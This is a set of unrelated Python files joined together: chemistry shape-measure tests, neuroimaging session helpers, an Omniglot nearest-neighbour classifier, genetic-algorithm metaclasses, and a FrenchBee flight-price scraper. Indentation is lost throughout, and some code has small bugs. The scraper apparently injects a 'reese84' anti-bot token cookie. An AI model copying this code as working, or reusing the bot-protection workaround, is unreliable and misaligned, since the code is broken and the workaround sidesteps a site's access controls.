results.append([shape.Shape(molecule).measure(reference_polyhedron[0], central_atom=options['%central_atom'])
for molecule in molecules])
results.append([shape.Shape(molecule).measure(reference_polyhedron[1], central_atom=options['%central_atom'])
for molecule in molecules])
calculated_results = [calculated_results, np.column_stack((results[0], results[1]))]
self.assertTrue(np.allclose(nice_structures, calculated_results[0], atol=1e-3))
self.assertTrue(np.allclose(nice_measures, calculated_results[1], atol=1e-3))
def test_example05(self):
nice_gen_coord = [84., 84., 25.4, 79.1, 23.7, 25., 54.6]
nice_measures = [[12.011, 0.954], [12.012, 0.957], [1.142, 11.245], [10.707, 1.236], [0.993, 12.826],
[1.105, 11.783], [5.203, 5.085]]
nice_dev_path = [7.2, 7.2, 6.5, 5.5, 10.6, 8.1, 8.6]
nice_path_coordinates = np.array([[0., 16.737],
[0.035, 15.355],
[0.144, 14.002],
[0.329, 12.681],
[0.593, 11.398],
[0.94, 10.158],
[1.371, 8.966],
[1.89, 7.828],
[2.497, 6.748],
[3.195, 5.732],
[3.984, 4.785],
[4.865, 3.911],
[5.837, 3.116],
[6.901, 2.403],
[8.055, 1.777],
[9.298, 1.241],
[10.626, 0.798],
[12.038, 0.45],
[13.53, 0.201],
[15.097, 0.05],
[16.737, 0.]])
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example05.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).measure(reference_polyhedron[0], central_atom=options['%central_atom'])
for molecule in molecules],
[shape.Shape(molecule).measure(reference_polyhedron[1], central_atom=options['%central_atom'])
for molecule in molecules]]
dev_path = [molecule.get_path_deviation(reference_polyhedron[0], reference_polyhedron[1],
central_atom=options['%central_atom'])
for molecule in molecules]
gen_coord = [molecule.get_generalized_coordinate(reference_polyhedron[0], reference_polyhedron[1],
central_atom=options['%central_atom'])
for molecule in molecules]
map = maps.get_shape_map(reference_polyhedron[0], reference_polyhedron[1], num_points=20)
self.assertTrue(np.allclose(nice_gen_coord, gen_coord, atol=1e-1))
calculated_results = np.column_stack((results[0], results[1]))
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-1))
self.assertTrue(np.allclose(nice_dev_path, dev_path, atol=1e-1))
self.assertTrue(np.allclose(nice_path_coordinates.T, map[:2], atol=1e-1))
def test_example06(self):
nice_dev_path = [0.9, 3.7, 4.1, 3.7, 3.1, 0.1, 0.7, 3.9, 4., 1.7, 1.9, 2.6, 1.4,
2.1, 1.5, 1.4, 4.3, 3.4, 1.1, 0.9, 1.6, 1.6, 0.1, 1.5, 2.5, 0.2,
0.6, 3.1, 1.6, 1.1, 0.5, 1.1, 0.5, 1.6, 0.3, 4.8, 3.4, 3., 4.4,
0.6, 0.8, 1., 0.6, 2.8, 3.3, 0.5, 0.6, 2.1, 3.5, 2.6, 4.7, 0.6,
0.7, 0.8, 4., 4.8, 1.3, 1.5, 1.3, 0.9, 2.2, 2.5, 4.6, 4.7, 4.7,
2.4, 0.8, 0., 1.3, 1.4, 1.4, 0.5, 1.7, 3.4, 4., 2.2, 0.4, 0.,
1.5, 1.8, 1., 4.5, 1.5, 1.5, 1.6, 0.7, 0.6, 2.3, 0.3, 0.2, 0.3,
4.2, 0.2, 0.4, 0.9, 0.3, 0.4, 0., 3.2, 1.4, 1.8, 1., 1.3, 0.6,
2., 0.3, 0., 0.1, 0.6, 2.1, 4.2, 1.6, 2.8, 1.5, 2.6, 2.8, 1.7,
0.3, 0.7, 0.5, 0.6, 0.6, 2.5, 1.5, 0.8, 0.3, 0.2, 0.8, 0.7, 3.6,
3.8, 4.5, 2.8, 1.5, 3.8, 1.8, 3.9, 1.5, 0.2, 0.4, 0.8, 2.5, 0.5,
2.6, 1.3, 0.8, 1.2, 1.9, 3.9, 2.4, 0.9, 0.4, 2.6, 0., 2.4, 1.7,
4.4, 1.6, 3.5, 3.8, 3.6, 4.7, 4.8, 3.7, 1.8, 1.6, 2.3, 3.7, 3.,
1.3, 0.9, 2.8, 0.9, 4.1, 3.2, 4.6, 1.7, 0.8, 1., 0.7, 0.6, 0.2,
4.6, 1.5, 1.5, 1.7, 2.5, 2.9, 0.5, 0.8, 1.3]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example06.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
symobj = Cosymlib(molecules)
shape_measure, devpath, get_coord = symobj.get_path_parameters(reference_polyhedron[0], reference_polyhedron[1],
central_atom=options['%central_atom'])
filter_mask = [dv < 5.0 and gc < 101 for dv, gc in zip(devpath, get_coord)]
devpath = np.array(devpath)[filter_mask]
self.assertTrue(np.allclose(nice_dev_path, devpath, atol=1e-1))
def test_example07(self):
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example06.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
symobj = Cosymlib(molecules)
shape_measure, devpath, get_coord = symobj.get_path_parameters(reference_polyhedron[0], reference_polyhedron[1],
central_atom=options['%central_atom'])
filter_mask = [dv < 5.0 and 40 < gc < 60 for dv, gc in zip(devpath, get_coord)]
devpath = np.array(devpath)[filter_mask]
self.assertTrue(np.allclose(0.2, devpath, atol=1e-1))
def test_example08(self):
nice_measures = [[1.976, 3.699],
[6.955, 0.602]]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example08.dat')
central_atom = options['%central_atom']
reference_polyhedron = []
if options['%labels'] != 0:
for number in options['%labels']:
if int(number) == 0:
for ref in file_io.get_geometry_from_file_ref(data_dir + '/shape/example08.ref', read_multiple=True):
reference_polyhedron.append(ref)
else:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).measure(reference_polyhedron[0], central_atom=central_atom)
for molecule in molecules], [shape.Shape(molecule).measure(reference_polyhedron[1],
central_atom=central_atom) for molecule
in molecules]]
calculated_results = np.column_stack((results[0], results[1]))
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-2))
    # Examples 9-12 all require the fixperm command, which is not yet included in the program
# def test_example09(self):
# # fixperm
# pass
# def test_example13(self):
#
# central_atom = 1
# ref_str1 = shape.shape_tools.get_test_structure('EP-9', central_atom)
# ref_str1 = shape.shape_tools.order_coordinates(ref_str1, [len(ref_str1), central_atom])
# ref_str2 = shape.shape_tools.get_test_structure('CSAPR-9', central_atom)
# ref_str2 = shape.shape_tools.order_coordinates(ref_str2, [len(ref_str2), central_atom])
# good_results = np.loadtxt(data_dir + '/shape/example09_results')
# self.assertTrue(np.allclose(good_results, ref_str1, atol=1e-3))
|
# coding: utf8
from copy import copy
import numpy as np
import pandas as pd
from os import path
def neighbour_session(session, session_list, neighbour):
if session not in session_list:
temp_list = session_list + [session]
temp_list.sort()
else:
temp_list = copy(session_list)
temp_list.sort()
index_session = temp_list.index(session)
if index_session + neighbour < 0 or index_session + neighbour >= len(temp_list):
return None
else:
if temp_list[index_session + neighbour] < 10:
return 'ses-M0' + str(temp_list[index_session + neighbour])
else:
return 'ses-M' + str(temp_list[index_session + neighbour])
def after_end_screening(session, session_list):
if session in session_list:
return False
else:
temp_list = session_list + [session]
temp_list.sort()
index_session = temp_list.index(session)
return index_session == len(temp_list) - 1
def last_session(session_list):
temp_list = copy(session_list)
temp_list.sort()
if temp_list[-1] < 10:
return 'ses-M0' + str(temp_list[-1])
else:
return 'ses-M' + str(temp_list[-1])
def complementary_list(total_list, sub_list):
result_list = []
for element in total_list:
if element not in sub_list:
result_list.append(element)
return result_list
def first_session(subject_df):
session_list = [int(session[5:]) for _, session in subject_df.index.values]
session_list.sort()
first_session = session_list[0]
if first_session < 10:
return 'ses-M0' + str(first_session)
else:
return 'ses-M' + str(first_session)
def next_session(subject_df, session_orig):
session_list = [int(session[5:]) for _, session in subject_df.index.values]
session_list.sort()
session_id_list = []
for session in session_list:
if session < 10:
session_id_list.append('ses-M0' + str(session))
else:
session_id_list.append('ses-M' + str(session))
index = session_id_list.index(session_orig)
if index < len(session_id_list) - 1:
return session_id_list[index + 1]
else:
raise ValueError('The argument session is the last session')
def extract_baseline(diagnosis_df, diagnosis, set_index=True):
from copy import deepcopy
if set_index:
all_df = diagnosis_df.set_index(['participant_id', 'session_id'])
else:
all_df = deepcopy(diagnosis_df)
result_df = pd.DataFrame()
for subject, subject_df in all_df.groupby(level=0):
baseline = first_session(subject_df)
subject_baseline_df = pd.DataFrame(data=[[subject, baseline] +
subject_df.loc[(subject, baseline)].tolist()],
columns=["participant_id", "session_id"] + subject_df.columns.values.tolist())
result_df = pd.concat([result_df, subject_baseline_df])
result_df["diagnosis"] = [diagnosis] * len(result_df)
result_df.reset_index(inplace=True, drop=True)
return result_df
def chi2(x_test, x_train):
from scipy.stats import chisquare
# Look for chi2 computation
total_categories = np.concatenate([x_test, x_train])
unique_categories = np.unique(total_categories)
f_obs = [(x_test == category).sum() / len(x_test) for category in unique_categories]
f_exp = [(x_train == category).sum() / len(x_train) for category in unique_categories]
T, p = chisquare(f_obs, f_exp)
return T, p
def add_demographics(df, demographics_df, diagnosis):
out_df = pd.DataFrame()
tmp_demo_df = copy(demographics_df)
tmp_demo_df.reset_index(inplace=True)
for idx in df.index.values:
participant = df.loc[idx, "participant_id"]
session = df.loc[idx, "session_id"]
row_df = tmp_demo_df[(tmp_demo_df.participant_id == participant) & (tmp_demo_df.session_id == session)]
out_df = pd.concat([out_df, row_df])
out_df.reset_index(inplace=True, drop=True)
out_df.diagnosis = [diagnosis] * len(out_df)
return out_df
def remove_unicity(values_list):
"""Count the values of each class and label all the classes with only one label under the same label."""
unique_classes, counts = np.unique(values_list, return_counts=True)
one_sub_classes = unique_classes[(counts == 1)]
for class_element in one_sub_classes:
values_list[values_list.index(class_element)] = unique_classes.min()
return values_list
def category_conversion(values_list):
values_np = np.array(values_list)
unique_classes = np.unique(values_np)
for index, unique_class in enumerate(unique_classes):
values_np[values_np == unique_class] = index + 1
return values_np.astype(int).tolist()
def find_label(labels_list, target_label):
if target_label in labels_list:
return target_label
else:
min_length = np.inf
found_label = None
for label in labels_list:
if target_label.lower() in label.lower() and min_length > len(label):
min_length = len(label)
found_label = label
if found_label is None:
raise ValueError(f"No label was found in {labels_list} for target label {target_label}.")
return found_label
def retrieve_longitudinal(df, diagnosis_df):
final_df = pd.DataFrame()
for idx in df.index.values:
subject = df.loc[idx, 'participant_id']
row_df = diagnosis_df[diagnosis_df.participant_id == subject]
final_df = pd.concat([final_df, row_df])
return final_df
def remove_sub_labels(diagnosis_df, sub_labels, diagnosis_df_paths, results_path,
logger=None):
from ..deep_learning.iotools import return_logger
if logger is None:
logger = return_logger(2, "remove sub labels")
supplementary_diagnoses = []
logger.debug('Before subjects removal')
sub_df = diagnosis_df.reset_index().groupby('participant_id')['session_id'].nunique()
logger.debug(f'{len(sub_df)} subjects, {len(diagnosis_df)} scans')
for label in sub_labels:
if f'{label}.tsv' in diagnosis_df_paths:
sub_diag_df = pd.read_csv(path.join(results_path, f'{label}.tsv'), sep='\t')
sub_diag_baseline_df = extract_baseline(sub_diag_df, label)
for idx in sub_diag_baseline_df.index.values:
subject = sub_diag_baseline_df.loc[idx, 'participant_id']
diagnosis_df.drop(subject, inplace=True, level=0)
supplementary_diagnoses.append(label)
logger.debug(f'Removed {len(sub_diag_baseline_df)} subjects based on {label} label')
sub_df = diagnosis_df.reset_index().groupby('participant_id')['session_id'].nunique()
logger.debug(f'{len(sub_df)} subjects, {len(diagnosis_df)} scans')
return diagnosis_df, supplementary_diagnoses
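# Hedged usage sketch with made-up session numbers: sessions are month offsets
# that the helpers above render as 'ses-MXX' identifiers.
if __name__ == "__main__":
    sessions = [0, 6, 12, 24]
    print(neighbour_session(6, sessions, 1))   # 'ses-M12' (next acquired session)
    print(neighbour_session(3, sessions, -1))  # 'ses-M00' (previous session of a missing one)
    print(after_end_screening(36, sessions))   # True: 36 lies after the last session
    print(last_session(sessions))              # 'ses-M24'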
|
<filename>classifiers/nearest_neighbor.py
import os
from argparse import ArgumentParser
from random import choice, seed
from heapq import nlargest
from typing import Callable
from aenum import NamedTuple
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
from torch.nn import CosineSimilarity
from torchvision.datasets import Omniglot
from torchvision import transforms
from tqdm import tqdm
from data.full_omniglot import FullOmniglot
from data.dataset import OmniglotReactionTimeDataset
from helpers.stratified_sampler import StratifiedKFoldSampler
# Constants:
MIN_NEIGHBORS: int = 1
MAX_NEIGHBORS: int = 32639
RESIZED_SIZE: list = [28, 28]
# NamedTuples:
LabeledScore: NamedTuple = NamedTuple("LabeledScore", "score label")
def get_nearest_neighbor(nearest_labels: list) -> int:
label_frequencies: dict = {}
for (score, label) in nearest_labels:
        label_frequencies[label] = label_frequencies.get(label, 0) + 1
frequency_labels: dict = {frequency: [] for frequency in label_frequencies.values()}
for label, frequency in label_frequencies.items():
frequency_labels[frequency].append(label)
maximum_frequency: int = max([frequency for frequency in frequency_labels.keys()])
# If we have a tie, we choose a label randomly. Otherwise, we have the winning label.
if len(frequency_labels[maximum_frequency]) > 1:
winning_label: int = choice(frequency_labels[maximum_frequency])
else:
winning_label: int = frequency_labels[maximum_frequency][0]
return winning_label
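# Hedged worked example (made-up scores): label 3 appears twice among the
# nearest neighbours and wins the majority vote, so the call returns 3.
#
# get_nearest_neighbor([LabeledScore(0.9, 3), LabeledScore(0.8, 3), LabeledScore(0.7, 1)])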
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("k", type=int, choices=range(MIN_NEIGHBORS, MAX_NEIGHBORS))
parser.add_argument("split", type=float)
parser.add_argument("--data_source", type=str, choices=["full", "background", "evaluation", "reaction-time"],
default="reaction-time")
parser.add_argument("--distance-type", type=str, choices=["cosine"], default="cosine")
parser.add_argument("--seed", type=int)
parser.add_argument("--split-type", type=str, choices=["random", "stratified"], default="random")
parser.add_argument("--transforms", type=str, choices=["raw", "resized"]) # TODO: make multi-arg
args = parser.parse_args()
# TODO: investigate subparsers?
if args.seed:
if args.seed >= 0:
seed(args.seed)
else:
raise ValueError("Invalid seed. Please try again.")
# We perform data validation for various options here:
if args.distance_type == "cosine":
distance_function: Callable = CosineSimilarity(dim=0)
else:
raise ValueError("Invalid distance type given. Please try again.")
if args.split_type == "random":
if args.split <= 0.0 or args.split >= 1.0:
raise ValueError("Invalid split percentage. Please provide a value within the range of (0, 1).")
elif args.split_type == "stratified":
if not args.split.is_integer() or args.split <= 1:
raise ValueError("Invalid number of folds. Please provide a value greater than one "
"and smaller than the data size.")
# Retrieve data from dataset:
transforms_list: list = [transforms.ToTensor()]
if args.transforms == "resized":
transforms_list.append(transforms.Resize(RESIZED_SIZE))
if args.transforms == "flattened":
        transforms_list.append(lambda t: t.flatten())
transform = transforms.Compose(transforms_list)
if args.data_source == "full":
dataset = FullOmniglot(os.getcwd(), transform=transform)
elif args.data_source == "background":
dataset = Omniglot(os.getcwd(), transform=transform)
elif args.data_source == "evaluation":
dataset = Omniglot(os.getcwd(), background=False, transform=transform)
elif args.data_source == "reaction-time":
dataset = OmniglotReactionTimeDataset('../sigma_dataset.csv', transforms=transform)
else:
raise ValueError("Appropriate dataset not specified. Please try again with one of the possible options.")
# We divide up the data into its component parts.
# Then, we name some set as the test set and perform the algorithm.
# Finally, we determine how well the algorithm did.
if args.split_type == "stratified":
folds = [fold for fold in StratifiedKFoldSampler(dataset, int(args.split))]
training_set: list = [index for fold in folds[0:int(args.split)] for index in fold]
test_set: list = folds[-1]
ground_truth: list = []
predictions: list = []
for test_index in tqdm(test_set):
test_tensor, test_label = dataset[test_index]
ground_truth.append(test_label)
labeled_scores: list = []
for training_index in training_set:
training_tensor, training_label = dataset[training_index]
labeled_scores.append(LabeledScore(distance_function(test_tensor, training_tensor), training_label))
maximum_labeled_scores = nlargest(n=args.k, iterable=labeled_scores, key=lambda x: x.score)
predicted_label = get_nearest_neighbor(maximum_labeled_scores)
predictions.append(predicted_label)
else:
raise NotImplementedError("Random sampling has not yet been implemented for this task.")
print(ground_truth)
print("\n")
print(predictions)
# Once we have the training and the test data, we can begin the algorithm.
# In particular, we use the distance_function to compute distance between each item.
# Then, we find the nlargest items in the array. We use the majority of their classes to classify the item.
# If there is no majority, we randomize between the most frequent classes.
# TODO: this is a little simplistic. We could do multiple things here: we could take the label with the best score,
# we could take the label with the best average score from those items with the highest frequency...
# Finally, we score the results.
accuracy: float = accuracy_score(ground_truth, predictions)
precision: float = precision_score(ground_truth, predictions, average='macro')
recall: float = recall_score(ground_truth, predictions, average='macro')
f1_score: float = f1_score(ground_truth, predictions, average='macro')
print(f"Results (Seed: {args.seed}):\n"
f"\t* Accuracy: {accuracy}\n"
f"\t* Precision: {precision}\n"
f"\t* Recall: {recall}\n"
f"\t* F1 Score: {f1_score}\n")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import inspect
from functools import wraps
from ..components.individual import IndividualBase
from ..components.population import Population
from ..mpiutil import master_only
class AnalysisMeta(type):
''' Metaclass for analysis plugin class
'''
def __new__(cls, name, bases, attrs):
# Check interval type.
if 'interval' in attrs:
interval = attrs['interval']
if type(interval) is not int or interval <= 0:
raise TypeError('analysis interval must be a positive integer')
for method_name in ['setup', 'register_step', 'finalize']:
method = attrs.get(method_name, None)
if method is not None and not callable(method):
msg = "{} must be a callable object".format(method)
raise AttributeError(msg)
# Set default interface methods.
elif method is None:
if method_name == 'setup':
attrs[method_name] = lambda self, ng, engine: None
elif method_name == 'register_step':
attrs[method_name] = lambda self, g, population, engine: None
elif method_name == 'finalize':
attrs[method_name] = lambda self, population, engine: None
# Check if the plugin is only used in master process.
called_in_master = attrs['master_only'] if 'master_only' in attrs else False
# Wrap all interfaces.
if called_in_master:
for method_name in ['setup', 'register_step', 'finalize']:
attrs[method_name] = master_only(attrs[method_name])
# Set logger.
logger_name = 'gaft.{}'.format(name)
attrs['logger'] = logging.getLogger(logger_name)
return type.__new__(cls, name, bases, attrs)
class CrossoverMeta(type):
''' Metaclass for crossover operator class.
'''
def __new__(cls, name, bases, attrs):
if 'cross' not in attrs:
raise AttributeError('crossover operator class must have cross method')
if 'pc' in attrs and (attrs['pc'] <= 0.0 or attrs['pc'] > 1.0):
raise ValueError('Invalid crossover probability')
cross = attrs['cross']
# Check parameter of cross method.
sig = inspect.signature(cross)
if 'father' not in sig.parameters:
raise NameError('cross method must have father parameter')
if 'mother' not in sig.parameters:
raise NameError('cross method must have mother parameter')
# Add parameter check to user-defined method.
@wraps(cross)
def _wrapped_cross(self, father, mother):
''' Wrapper to add parameters type checking.
'''
# Check parameter types.
if not (isinstance(father, IndividualBase) and
isinstance(mother, IndividualBase)):
                raise TypeError("father and mother's type must be a subclass of IndividualBase")
return cross(self, father, mother)
attrs['cross'] = _wrapped_cross
# Set logger.
logger_name = 'gaft.{}'.format(name)
attrs['logger'] = logging.getLogger(logger_name)
return type.__new__(cls, name, bases, attrs)
class MutationMeta(type):
''' Metaclass for mutation operator class.
'''
def __new__(cls, name, bases, attrs):
if 'mutate' not in attrs:
raise AttributeError('mutation operator class must have mutate method')
if 'pm' in attrs and (attrs['pm'] <= 0.0 or attrs['pm'] > 1.0):
raise ValueError('Invalid mutation probability')
mutate = attrs['mutate']
# Check parameters of mutate method.
sig = inspect.signature(mutate)
if 'individual' not in sig.parameters:
raise NameError('mutate method must have individual parameter')
# Add parameter check to user-defined method.
@wraps(mutate)
def _wrapped_mutate(self, individual, engine):
''' Wrapper to add parameters type checking.
'''
# Check parameter types.
if not isinstance(individual, IndividualBase):
                raise TypeError("individual's type must be a subclass of IndividualBase")
return mutate(self, individual, engine)
attrs['mutate'] = _wrapped_mutate
# Set logger.
logger_name = 'gaft.{}'.format(name)
attrs['logger'] = logging.getLogger(logger_name)
return type.__new__(cls, name, bases, attrs)
class SelectionMeta(type):
''' Metaclass for selection operator class.
'''
def __new__(cls, name, bases, attrs):
# Check select method.
if 'select' not in attrs:
raise AttributeError('selection operator class must have select method')
select = attrs['select']
# Check select arguments.
sig = inspect.signature(select)
if 'population' not in sig.parameters:
raise NameError('select method must have population parameter')
if 'fitness' not in sig.parameters:
raise NameError('select method must have fitness parameter')
# Add parameter check to user-defined method.
@wraps(select)
def _wrapped_select(self, population, fitness):
''' Wrapper to add parameters type checking.
'''
# Check parameter types.
if not isinstance(population, Population):
raise TypeError('population must be Population object')
if not callable(fitness):
raise TypeError('fitness must be a callable object')
return select(self, population, fitness)
attrs['select'] = _wrapped_select
# Set logger.
logger_name = 'gaft.{}'.format(name)
attrs['logger'] = logging.getLogger(logger_name)
return type.__new__(cls, name, bases, attrs)
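# Hedged usage sketch: a minimal crossover operator built on CrossoverMeta.
# `PassThroughCrossover` is a made-up name; the metaclass only requires a
# `cross(self, father, mother)` method and, if given, a `pc` in (0.0, 1.0].
#
# class PassThroughCrossover(metaclass=CrossoverMeta):
#     pc = 0.8
#
#     def cross(self, father, mother):
#         # Trivial crossover: return the parents unchanged. The wrapper added
#         # by CrossoverMeta still verifies both arguments are IndividualBase
#         # instances before this body runs.
#         return father, mother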
|
<gh_stars>0
from dataclasses import dataclass
from datetime import datetime
import json
from requests import Session, Response
from typing import Any, Iterable, List, Tuple, Union, Dict
import re
import html
import jsonpath_ng as jsonpath
from .reese84 import FrenchBeeReese84
from .models import Location, PassengerInfo, Flight, DateAndLocation, Segment, Trip
@dataclass
class FrenchBeeResponse:
command: str
selector: str
method: str
args: List[
Union[str, dict]
] # dict(departure => [year => { month => { day => { data... }} }])
data: str
class FrenchBee:
def __init__(self) -> None:
self.session = Session()
self.session.headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
}
self.session.cookies["base_host"] = "frenchbee.com"
self.session.cookies["market_lang"] = "en"
self.session.cookies["site_origin"] = "us.frenchbee.com"
def _make_search_request(
self,
source: str,
destination: str,
passengers: PassengerInfo,
departure: datetime,
returns: datetime,
module: str,
) -> List[FrenchBeeResponse]:
url: str = "https://us.frenchbee.com/en?ajax_form=1"
departure_date: str = f"{departure:%Y-%m-%d}" if departure else ""
return_date: str = f"{returns:%Y-%m-%d}" if returns else ""
payload: Dict[str, Any] = {
"visible_newsearch_flights_travel_type": "R",
"visible_newsearch_flights_from": source,
"visible_newsearch_flights_to": destination,
"newsearch_flights_travel_type": "R",
"newsearch_flights_from": source,
"newsearch_flights_to": destination,
"newsearch_flights_departure_date": departure_date,
"newsearch_flights_return_date": return_date,
"adults-count": passengers.Adults,
"children-count": passengers.Children,
"infants-count": passengers.Infants,
"um_youth-count": 0,
"form_id": "frenchbee-amadeus-search-flights-form",
"_triggering_element_name": module,
}
response: Response = self.session.post(url, data=payload)
return [
FrenchBeeResponse(
command=resp.get("command"),
method=resp.get("method"),
selector=resp.get("selector"),
args=resp.get("args") or [],
data=resp.get("data"),
)
for resp in response.json()
]
def _normalize_response(self, response: Dict[str, Any]) -> Dict[datetime, Flight]:
if not response:
return None
normalize: Dict[datetime, Flight] = {}
for (
key_year,
months,
) in (
response.items()
): # key_year: str, months: Dict[str, Dict[str, Dict[str, Any]]]
year: int = int(key_year)
for (
key_month,
days,
) in months.items(): # key_month: str, days: Dict[str, Dict[str, Any]]
month: int = int(key_month)
for (
key_day,
flight,
) in days.items(): # key_day: str, flight: Dict[str, Any]
day: int = int(key_day)
normalize[datetime(year, month, day)] = Flight(
arrival_airport=flight.get("arrival_airport"),
currency=flight.get("currency"),
day=datetime.strptime(flight.get("day"), "%Y-%m-%d"),
departure_airport=flight.get("departure_airport"),
is_offer=flight.get("is_offer"),
price=float(flight.get("price")),
tax=float(flight.get("tax")),
)
return normalize
def get_departure_availability(self, trip: Trip) -> Dict[datetime, Flight]:
payload: List[FrenchBeeResponse] = self._make_search_request(
source=trip.origin_depart.location.code,
destination=trip.destination_return.location.code,
passengers=trip.passengers,
departure=None,
returns=None,
module="visible_newsearch_flights_to",
)
        info: FrenchBeeResponse = next(
            filter(lambda r: r.args and r.args[0] == "departureCalendarPriceIsReady", payload),
            None,
        )
        return (
            self._normalize_response(info.args[1].get("departure"))
            if info and len(info.args) >= 2 and info.args[1]
            else None
        )
def get_return_availability(self, trip: Trip) -> Dict[datetime, Flight]:
payload: List[FrenchBeeResponse] = self._make_search_request(
source=trip.origin_depart.location.code,
destination=trip.destination_return.location.code,
passengers=trip.passengers,
departure=trip.origin_depart.date,
returns=None,
module="visible_newsearch_flights_departure_date",
)
        info: FrenchBeeResponse = next(
            filter(lambda i: i.args and i.args[0] == "returnCalendarPriceIsReady", payload), None
        )
        return (
            self._normalize_response(info.args[1].get("return"))
            if info and len(info.args) >= 2 and info.args[1]
            else None
        )
def get_departure_info_for(self, trip: Trip) -> Flight:
info: Dict[datetime, Flight] = self.get_departure_availability(trip)
return info.get(trip.origin_depart.date) if info else None
def get_return_info_for(self, trip: Trip) -> Flight:
info: Dict[datetime, Flight] = self.get_return_availability(trip)
return info.get(trip.destination_return.date) if info else None
def get_flight_times(self, trip: Trip) -> Trip:
form_url, form_inputs = self._get_flight_times_form_parameters(trip)
token: str = FrenchBeeReese84().token()
self.session.cookies.set("reese84", token, domain="vols.frenchbee.com")
response: Response = self.session.post(form_url, data=form_inputs)
html_body: str = response.text
script: Dict[str, Any] = self._get_flight_times_script(html_body)
with open("s.json", "w") as f:
f.write(json.dumps(script, indent=4, sort_keys=True))
bounds: List[Dict[str, Any]] = self._get_json_path(
script,
"$.pageDefinitionConfig.pageData.business.Availability.proposedBounds",
)
departure_options: List[Dict[str, Any]] = bounds[0].get(
"proposedFlightsGroup", []
)
return_options: List[Dict[str, Any]] = bounds[1].get("proposedFlightsGroup", [])
trip.origin_segments = list(self._get_segment_options(departure_options))
trip.destination_segments = list(self._get_segment_options(return_options))
return trip
def _get_flight_times_form_parameters(
self, trip: Trip
) -> Tuple[str, Dict[str, str]]:
payload: List[FrenchBeeResponse] = self._make_search_request(
source=trip.origin_depart.location.code,
destination=trip.destination_return.location.code,
passengers=trip.passengers,
departure=trip.origin_depart.date,
returns=trip.destination_return.date,
module="op",
)
        resp: FrenchBeeResponse = next(
            filter(lambda i: i.command == "insert", payload), None
        )
        if not resp:
            return
        form_match: re.Match = re.search(
            r'<form[^>]*action="([^"]+)"[^>]*>', resp.data
        )
if not form_match:
return
form_url: str = form_match.group(1)
        input_match: List[Tuple[str, str]] = re.findall(
            r'<input[^>]*name="([^"]+)"[^>]*value="([^"]+)"[^>]*>', resp.data
        )
form_inputs: Dict[str, str] = {key: value for key, value in input_match}
if "EXTERNAL_ID" in form_inputs:
form_inputs["EXTERNAL_ID"] = html.unescape(form_inputs["EXTERNAL_ID"])
return (form_url, form_inputs)
def _get_flight_times_script(self, html_body: str) -> Dict[str, Any]:
script_start: str = "PlnextPageProvider.init("
idx_start: int = html_body.index(script_start) + len(script_start)
idx_start = html_body.index(
"config", idx_start
) # outer layer is not valid JSON
idx_start = html_body.index("{", idx_start)
script_end: str = "pageEngine"
idx_end: int = html_body.index(script_end, idx_start)
idx_end = (
html_body.rindex("}", idx_start, idx_end) + 1
) # walk backwards to find the end
script: str = html_body[idx_start:idx_end]
return json.loads(script)
def _get_segment_options(
self, options: List[Dict[str, Any]]
) -> Iterable[List[Segment]]:
for option in options:
segments_for_option: List[Segment] = option.get("segments", [])
segments: List[Segment] = []
for segment_option in segments_for_option:
segment: Segment = Segment(
airline_code=segment_option.get("airline", {}).get("code"),
airline_name=segment_option.get("airline", {}).get("name"),
flight_num=segment_option.get("flightNumber"),
duration=int(segment_option.get("segmentTime") or "0"),
start=DateAndLocation(
date=self._get_datetime_gmt(segment_option.get("beginDateGMT")),
location=Location(
code=segment_option.get("beginLocation", {}).get(
"locationCode"
),
name=segment_option.get("beginLocation", {}).get(
"locationName"
),
terminal=segment_option.get("beginTerminal"),
transport=segment_option.get("equipment", {}).get("name"),
),
),
end=DateAndLocation(
date=self._get_datetime_gmt(segment_option.get("endDateGMT")),
location=Location(
code=segment_option.get("endLocation", {}).get(
"locationCode"
),
name=segment_option.get("endLocation", {}).get(
"locationName"
),
terminal=segment_option.get("endTerminal"),
),
),
)
segments.append(segment)
yield segments
def _get_json_path(self, json_object: Any, path: str, default: Any = None) -> Any:
extractor = jsonpath.parse(path) # no type given
matches = extractor.find(json_object)
if matches:
if len(matches) == 1:
return matches[0].value
return [match.value for match in matches]
return default
def _get_datetime_gmt(self, value: str, default: Any = None) -> datetime:
if value:
return datetime.strptime(value, "%b %d, %Y %I:%M:%S %p")
return default
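# --- Illustrative sketch (added; not in the original module): _normalize_response
# --- flattens the nested year -> month -> day calendar returned by the French Bee
# --- search endpoint into a {datetime: Flight} mapping. The payload literal below is
# --- hypothetical, shaped only after the parsing code above.
#   sample = {"2024": {"5": {"17": {
#       "arrival_airport": "ORY", "departure_airport": "EWR", "currency": "USD",
#       "day": "2024-05-17", "is_offer": False, "price": "213.00", "tax": "98.40"}}}}
#   flights = FrenchBee()._normalize_response(sample)
#   flights[datetime(2024, 5, 17)].price  # -> 213.0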
|
"""
MIT License
Copyright (c) 2020 <NAME> - dominik.kopczynski {at} isas.de
<NAME> - nils.hoffmann {at} isas.de
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
